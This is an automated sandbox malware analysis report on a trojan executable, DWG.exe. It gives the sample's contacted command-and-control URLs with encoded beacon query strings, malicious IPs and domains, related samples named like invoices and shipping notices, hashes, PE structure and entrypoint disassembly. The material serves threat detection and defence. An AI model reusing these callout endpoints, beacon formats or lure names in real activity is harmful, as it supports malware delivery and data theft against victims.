www.publiccoins.online | unknown | unknown | true | | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt | true | Avira URL Cloud: safe | unknown
http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE | true | Avira URL Cloud: safe | unknown
www.elsist.online/xzes/ | true | Avira URL Cloud: safe | low
http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB | true | Avira URL Cloud: safe | unknown
http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt | true | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://zz.bdstatic.com/linksubmit/push.js | svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp | false | | high
https://www.yourhosting.nl/parkeerpagina.html | svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp | false | | high
http://schemas.mi | explorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://push.zhanzhang.baidu.com/push.js | svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp | false | | high

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.187.31.159 | publiccoins.online | United States | 22612 | NAMECHEAP-NETUS | true
154.216.113.38 | www.jntycy.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
198.54.117.215 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
5.157.87.204 | thebrandstudiointernational.com | Netherlands | 48635 | ASTRALUSNL | true

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:510733
                                    Start date:28.10.2021
                                    Start time:07:38:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:DWG.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/0@10/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 65% (good quality ratio 59.6%)
                                    • Quality average: 72.1%
                                    • Quality standard deviation: 31.3%
                                    HCA Information:
                                    • Successful, ratio: 85%
                                    • Number of executed functions: 102
                                    • Number of non-executed functions: 158
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235
                                    • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes were analyzed; the report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    Match | Associated Sample Name / URL | Detection | Context
                                    198.187.31.159 | DHL Shipment Notification 74683783.exe | malicious | www.despachantemedeiros.digital/i6rd/?Y8=1bxX_L&k48hR8=oD4D3WBtzYo1qnPRU4xFACU8AEOn6ZKUJX42WoqGOohaqc1Klm4dkQagQXOcbxO0AuNj
                                    198.187.31.159 | confirmation bancaire.xlsm | malicious | abrakadamnasja.xyz/css/Jm.exe
                                    198.187.31.159 | HSBC -- Wire Transfer copy.exe | malicious | cameronznxbas.xyz/css/st.exe
                                    198.187.31.159 | qkWaxZQ3dW.exe | malicious | cameronznxbas.xyz/css/st.exe
                                    198.187.31.159 | HPEE IMAGES-SPECIFICATION ORDER - Copy.xlsm | malicious | cameronznxbas.xyz/css/st.exe
                                    198.54.117.215 | Payment Advice.exe | malicious | www.swalayan.digital/i6rd/?5jQ=A6AdAx&W2MXD=93HbYkqhlgr3hIa7US827LxV1rVmh2fzufxww1YrXPJhXqBeF4zo1K/jxwKPrkIKYKuy
                                    198.54.117.215 | payment advice0272110.exe | malicious | www.lesbianrofsmo.xyz/anab/?CrQPabN=Hxy3RWVe69Cd7uohsVYEg0a3P3V/BArEGZWWXU9j8C4XG3zaWh17NoDyO0SzZtoKrMy6&_fQL6d=_Tb0RzfHQPihG
                                    198.54.117.215 | Amended Order.xlsx | malicious | www.usbgdt.com/upi8/?8p1ph=3UbDyqfm57lZRZ3h0rb1PNAqbmd7pBi1w5Vc7dibSIZzJ8oi4VLl/ITubhE1ReV/9McpbA==&gFQtn4=8pLLUjVPw6XD
                                    198.54.117.215 | 1.exe | malicious | www.storiedpklnfo.xyz/cr35/?w0G=w6ATHTlpqz&Sj=R7uFhzm4gcxwYFTLKNpfOX8NH1TtMCM9jOrf3U7j71VMynR5kMeFj7P2GspnCIocjCkv
                                    198.54.117.215 | F9ObnUc4ol.exe | malicious | www.estudioamlegal.com/n58i/?V2JtX25=3sVI0/i2PyG3qUu4YTCUVrirDvoK3EI1NalLdVavy+6aj+oUnzTEerwQaaYisqIiJdwL&r0G4n8=4h-Li0
                                    198.54.117.215 | QUOTATION.exe | malicious | www.rjm226.com/d6pu/?y6Ah=E+oDRIxCy00LbbvBKWdFJBfE6OJ7C6i7pv3ziVqmlDcWx/nP77f/582lUnUjvWzaxdFqo3fvtw==&SD=Kn0PFhqhflm8
                                    198.54.117.215 | TDCKZy88Av.exe | malicious | www.narbaal.com/ef6c/?Y8hHaDY=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvl2Js1jTOwhE&cTql2=VN6dXjmhbR4LNtZ
                                    198.54.117.215 | Un81iJoK7J.exe | malicious | www.growthabove.com/mexq/?1buhg=bdD4kHkGAKKARS2/MEaB/x1q3EjiCm0+FjMgd+v9P+tpp1aX/jd81LI1hNYmT9g5/78j&k6p=eN6tpho
                                    198.54.117.215 | Cs3PcPy48f.msi | malicious | www.dentureslenexa.com/fs3g/?2duD_V=5jLpSh&Nr=EvxTxkBKE/8KN4lE/0q+ZfOvMRN8EAws2Pchhx6z9xfjDddqEbBmmgVms/hUQamvUHB1
                                    198.54.117.215 | KYTransactionServer.exe | malicious | www.shtfinc.net/c8te/?_v3DpJ=4hoXJ0DHn0Nl5f&Hr=c4KXaeS6FUIM9Kkw5zq+LKxJtHGo+puYIzc+2WNcthS4RqO94x3yQg9DX6qTkjFSnzqd
                                    198.54.117.215 | MIN8gr0eOj.exe | malicious | www.diemcoin.one/pusp/?l0G=g0DTGJ5xhz3djJ&nnf=T0TgMD+6mn0DuMBmOzP3zXvuOjkt3/ENl7Tx/oMm/vomXqjYGAstOhThgpdXe/7E0j19
                                    198.54.117.215 | NEW ORDER INQUIRY_Q091421.PDF.exe | malicious | www.shuterestock.com/h5jc/?8pW=sHmAg5sqI9KQ6giaeL488tnzzkTJjyzeNMirB4cW9uUfC9OAP0nw0RzKpDngt1/tFv6F&1bE8p=8p04q8mHnH
                                    198.54.117.215 | p83BktbXwe.exe | malicious | www.narbaal.com/ef6c/?YFQLD6=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvmagv1frHTUSCXVL+Q==&TN6=m6pTon
                                    198.54.117.215 | RFQ453266433,pdf.exe | malicious | www.socw.quest/dhua/?3ffh2ZO=XFJc1d+jHKZ2Ha3XF2pE/YK3hsm0H6SvQpEs8n+iI9sUFAN8uD9sSzhfglXAjmxyVYQA&UL=7nl0dra
                                    198.54.117.215 | INVOICE.exe | malicious | www.cockevodka.com/avqp/?LVl4iT=JN6HZxgh3h&nVw=j6FgMNUKQV6/m21MJvb0Ahqoc0m5WXE/0aHxV1wTX7IDWaC9PVxVO6/rPmm34gnoEjQs
                                    198.54.117.215 | qFghuPTDuw.exe | malicious | www.theadamcook.com/heth/?j48D=mDHPtfePwBFdPz&ZL3DB4=NDMUETaAEYpdEScjys5sfqa6oGQbzTI6bu3Tns5CefClzmXnigQog1+lgVVQ3ZRuGxjS/TCtDg==
                                    198.54.117.215 | RFQ9003930 New Order.doc | malicious | www.ceasa.club/hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS
                                    198.54.117.215 | DHL_Sender_Documents_Details_021230900.xlsx | malicious | www.why5mkt.com/m0np/?yPYP=KzrHnBoXSh&rN=pd8cLhyOD3Lvxu11EJvjnZnH7gmMmwGj/LLxrvXSZ/i0D2RlpnhF/0V5Vat1PcQ79Dzd8Q==
                                    198.54.117.215 | 85fX3YfW9S.exe | malicious | www.roamingtrysha.com/hosg/?jBZ=1hNtiMcbd7AV+Zxw6jfXRht5026Vx3qKPd04RWegYVvuIjBVGyS0SVYMe04Jcmf/ypJkLnFPJw==&7n3=NFNTfdm8IF
                                    198.54.117.215 | sprogr.exe | malicious | www.kingofearth.love/myec/?LN689n=gh_TCpB&TBZh=7FWPYjaftzZ9H+gOW7161VQo7iIc+pdumeJhNdLHyulg3WNK/ncUHy14UGVnTYt1iuwi

                                    Domains

                                    Match | Associated Sample Name / URL | Detection | Context
                                    parkingpage.namecheap.com | Betalingskvittering.exe | malicious | 198.54.117.217
                                    parkingpage.namecheap.com | Payment Advice.exe | malicious | 198.54.117.215
                                    parkingpage.namecheap.com | payment advice0272110.exe | malicious | 198.54.117.215
                                    parkingpage.namecheap.com | DHL.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | Order of CB-15GL PO530_pdf.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | RFQ_PI02102110.exe | malicious | 198.54.117.216
                                    parkingpage.namecheap.com | cNOilTxTR3.exe | malicious | 198.54.117.218
                                    parkingpage.namecheap.com | lCFjxhAqu3.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | Amended Order.xlsx | malicious | 198.54.117.215
                                    parkingpage.namecheap.com | OS-QTN-0320-21-Rev1.exe | malicious | 198.54.117.210
                                    parkingpage.namecheap.com | 1.exe | malicious | 198.54.117.215
                                    parkingpage.namecheap.com | DRAFT CONTRACT 0000499000-1100928777-pdf.exe | malicious | 198.54.117.211
                                    parkingpage.namecheap.com | U8NUCQkg3s.exe | malicious | 198.54.117.218
                                    parkingpage.namecheap.com | #U041a#U0430#U0441#U043e#U0432#U0430 #U0431#U0435#U043b#U0435#U0436#U043a#U0430.exe | malicious | 198.54.117.216
                                    parkingpage.namecheap.com | triage_dropped_file.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | 2500010PO.excel.exe | malicious | 198.54.117.216
                                    parkingpage.namecheap.com | MAERSK LINE SHIPPING DOCUMENT_pdf.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | triage_dropped_file.exe | malicious | 198.54.117.212
                                    parkingpage.namecheap.com | F9ObnUc4ol.exe | malicious | 198.54.117.211
                                    parkingpage.namecheap.com | notification@dhl.com,pdf.exe | malicious | 198.54.117.217

                                    ASN

                                    Match | Associated Sample Name / URL | Detection | Context
                                    NAMECHEAP-NETUS | PROFORMA INVOICE.exe | malicious | 199.188.205.66
                                    NAMECHEAP-NETUS | MT103-Advance.Payment.exe | malicious | 198.54.122.60
                                    NAMECHEAP-NETUS | Betalingskvittering.exe | malicious | 198.54.117.217
                                    NAMECHEAP-NETUS | 10272021-AM65Application.HTM | malicious | 104.219.248.99
                                    NAMECHEAP-NETUS | Payment Advice.exe | malicious | 198.54.117.215
                                    NAMECHEAP-NETUS | Tfwyelel3H.exe | malicious | 192.64.119.254
                                    NAMECHEAP-NETUS | QQIksbWrVl.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exe | malicious | 198.54.126.156
                                    NAMECHEAP-NETUS | DUT2Aj4C2x.exe | malicious | 185.61.153.108
                                    NAMECHEAP-NETUS | Swift Payment Notification.xlsx | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | MT103USD.xlsx | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | DHL_document11022020680908911.exe | malicious | 198.54.114.114
                                    NAMECHEAP-NETUS | payment advice0272110.exe | malicious | 198.54.117.215
                                    NAMECHEAP-NETUS | R0ptlo2GB2.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | QRT#U00a0(20211027#00001)#U00a0ACSAM-6000RC Quote.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | Order.exe | malicious | 192.64.119.74
                                    NAMECHEAP-NETUS | PNkEr1lc2k.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | Enquiry docs_001.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | PO 211027-031A.exe | malicious | 63.250.40.204
                                    NAMECHEAP-NETUS | PO_SBK4128332S.exe | malicious | 198.54.114.114
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | dhl.exe | malicious | 156.242.205.175
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | Order Requiremnt-Oct-2021.exe | malicious | 154.215.87.120
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | 2500010PO.excel.exe | malicious | 154.215.95.146
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | apep.arm | malicious | 154.216.35.210
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | yOtRXukeq9 | malicious | 154.203.73.148
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | Shipping_Doc190dk0lwt837.exe | malicious | 154.216.110.154
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | Order 0091.exe | malicious | 154.201.193.247
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | fzkfNBkz1C | malicious | 154.93.111.235
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | FWsCarsq8Q | malicious | 156.242.206.33
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | buiodawbdawbuiopdw.x86 | malicious | 156.244.139.182
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | x86 | malicious | 156.242.206.59
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | 7qvn4qlmi3 | malicious | 156.251.7.162
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | GRPVtMlbK5 | malicious | 156.242.206.39
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | AWB##29721.PDF.exe | malicious | 156.242.202.179
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | UNNEIaOxVM | malicious | 160.124.155.159
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | arm7.light | malicious | 156.242.206.27
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | UniRHdW5VC | malicious | 156.251.7.176
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | KEgx4lC3Ni | malicious | 156.243.251.0
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | x86 | malicious | 156.244.234.124
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK | x86 | malicious | 156.244.234.124

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.157238812032227
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:DWG.exe
                                    File size:626688
                                    MD5:ff882802d113ed02fa070c496f89d797
                                    SHA1:aad1eed1c53f1d33ab52e13442b036bfeee91f1b
                                    SHA256:4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
                                    SHA512:9785432a34fdb1132ddd8185fa2fdfae4db726be0bc14995a67520f10ad3fab4f2ce9c3a311c6e3c5163b3bde67942af6e4c75216914577eb3e47a17bb102512
                                    SSDEEP:12288:N7MTwrEg4nkEo2sH2yefktZkgHAyRsrGGFJr23+sejpAmiL:lMTwrEgskEorogHA0slrsfejc
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qE^$5$0w5$0w5$0wN8<w4$0wc;#w.$0w5$0w.$0w.8>w.$0w.;:w.$0w5$1w.%0wW;#w $0w."6w4$0w.;;wj$0wRich5$0w........................PE..L..

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4367cb
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x5846A1B8 [Tue Dec 6 11:32:08 2016 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:c4824f327856ec0705e7797356a7405e

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    push FFFFFFFFh
                                    push 00460F30h
                                    push 0043B828h
                                    mov eax, dword ptr fs:[00000000h]
                                    push eax
                                    mov dword ptr fs:[00000000h], esp
                                    sub esp, 58h
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [ebp-18h], esp
                                    call dword ptr [004511ACh]
                                    xor edx, edx
                                    mov dl, ah
                                    mov dword ptr [00471604h], edx
                                    mov ecx, eax
                                    and ecx, 000000FFh
                                    mov dword ptr [00471600h], ecx
                                    shl ecx, 08h
                                    add ecx, edx
                                    mov dword ptr [004715FCh], ecx
                                    shr eax, 10h
                                    mov dword ptr [004715F8h], eax
                                    push 00000001h
                                    call 00007FC6445A8F68h
                                    pop ecx
                                    test eax, eax
                                    jne 00007FC6445A678Ah
                                    push 0000001Ch
                                    call 00007FC6445A6848h
                                    pop ecx
                                    call 00007FC6445A84B6h
                                    test eax, eax
                                    jne 00007FC6445A678Ah
                                    push 00000010h
                                    call 00007FC6445A6837h
                                    pop ecx
                                    xor esi, esi
                                    mov dword ptr [ebp-04h], esi
                                    call 00007FC6445AB597h
                                    call dword ptr [004510ECh]
                                    mov dword ptr [00472D18h], eax
                                    call 00007FC6445AB455h
                                    mov dword ptr [004715E8h], eax
                                    call 00007FC6445AB1FEh
                                    call 00007FC6445AB140h
                                    call 00007FC6445A73AEh
                                    mov dword ptr [ebp-30h], esi
                                    lea eax, dword ptr [ebp-5Ch]
                                    push eax
                                    call dword ptr [004510E8h]
                                    call 00007FC6445AB0D1h
                                    mov dword ptr [ebp-64h], eax
                                    test byte ptr [ebp-30h], 00000001h
                                    je 00007FC6445A6788h
                                    movzx eax, word ptr [ebp+00h]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [RES] VS98 (6.0) cvtres build 1720

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x65620 | 0x104 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x75055 | 0x1c | .zrjfv
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x51000 | 0x558 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x50000 | 0x50000 | False | 0.539175415039 | data | 6.35769619618 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x51000 | 0x17000 | 0x17000 | False | 0.550239894701 | data | 6.611499798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x68000 | 0xb848 | 0x8000 | False | 0.738403320312 | data | 6.93245568667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .zrjfv | 0x74000 | 0x28ee9 | 0x29000 | False | 0.950373951982 | PGP\011Secret Sub-key - | 7.98479058964 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                    Imports

                                    DLL | Import
                                    OPENGL32.dll | glGenTextures, glBindTexture, glTexParameteri, glTexImage2D, glBegin, glArrayElement
                                    KERNEL32.dll | RtlUnwind, HeapAlloc, HeapFree, HeapReAlloc, GetTimeZoneInformation, GetSystemTime, GetLocalTime, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, TerminateProcess, HeapSize, GetACP, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, SetFileTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetProfileStringA, GetDiskFreeSpaceExA, GetVolumeInformationA, GetDriveTypeA, VirtualProtect, GetProcAddress, GetModuleHandleA, lstrcpyA, GlobalDeleteAtom, GlobalFindAtomA, GlobalAddAtomA, lstrcmpiA, GlobalGetAtomNameA, GetCurrentThreadId, lstrcatA, GetVersion, LockResource, LoadResource, FindResourceA, FreeLibrary, LoadLibraryA, InterlockedIncrement, InterlockedDecrement, lstrlenA, WideCharToMultiByte, MultiByteToWideChar, SetLastError, MulDiv, GlobalUnlock, GlobalLock, lstrcpynA, GetLastError, LocalFree, FormatMessageA, GlobalFree, GetCurrentThread, lstrcmpA, GlobalAlloc, GetModuleFileNameA, GetFileTime, GetFileSize, GetFileAttributesA, GetTickCount, FileTimeToLocalFileTime, FileTimeToSystemTime, GetFullPathNameA, FindFirstFileA, FindClose, DeleteFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, SetErrorMode, GetThreadLocale, GetCurrentDirectoryA, WritePrivateProfileStringA, SizeofResource, GetOEMCP, GetCPInfo, GetProcessVersion, GlobalFlags, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, CloseHandle
                                    USER32.dll | MessageBeep, CharUpperA, RegisterClipboardFormatA, PostThreadMessageA, LoadStringA, DestroyMenu, GetSysColorBrush, LoadCursorA, GetDesktopWindow, PtInRect, GetClassNameA, MapDialogRect, SetWindowContextHelpId, GetMessageA, TranslateMessage, ValidateRect, GetCursorPos, SetCursor, PostQuitMessage, EndDialog, GetActiveWindow, CreateDialogIndirectParamA, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetNextDlgGroupItem, IsWindowEnabled, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, PostMessageA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, GetFocus, SetActiveWindow, IsWindow, SetFocus, AdjustWindowRectEx, ScreenToClient, CopyRect, IsWindowVisible, InflateRect, FillRect, GetClientRect, UnregisterClassA, LoadBitmapA, HideCaret, ShowCaret, ExcludeUpdateRgn, GetTopWindow, MessageBoxA, IsChild, GetParent, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, SetRect, CopyAcceleratorTableA, CharNextA, GetNextDlgTabItem, GetMenuItemID, DrawFocusRect, DefDlgProcA, IsWindowUnicode, InvalidateRect, EnableWindow, GetSystemMetrics, DrawIcon, SendMessageA, IsIconic, LoadIconA, GetWindowRect, GetWindowPlacement, SystemParametersInfoA, IntersectRect, OffsetRect, RegisterWindowMessageA, SetWindowPos, SetWindowLongA, GetWindowLongA, GetWindow, SetForegroundWindow, GetForegroundWindow, GetLastActivePopup, GetMessagePos, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, DestroyWindow, GetDlgItem, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA
                                    GDI32.dll | GetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, DeleteObject, SelectObject, GetDeviceCaps, GetViewportExtEx, GetWindowExtEx, CreatePen, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetMapMode, PatBlt, DPtoLP, GetTextColor, GetBkColor, LPtoDP, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, LineDDA, Pie, CreateFontA, CreateDIBitmap, GetTextExtentPointA, BitBlt, CreateCompatibleDC, CreateSolidBrush
                                    comdlg32.dll | GetFileTitleA
                                    WINSPOOL.DRV | DocumentPropertiesA, OpenPrinterA, ClosePrinter
                                    ADVAPI32.dll | RegCloseKey, RegSetValueExA, RegOpenKeyExA, RegCreateKeyExA
                                    COMCTL32.dll |
                                    oledlg.dll |
                                    ole32.dll | CoFreeUnusedLibraries, CoRegisterMessageFilter, OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoRevokeClassObject, OleFlushClipboard, OleIsCurrentClipboard, OleUninitialize
                                    OLEPRO32.DLL |
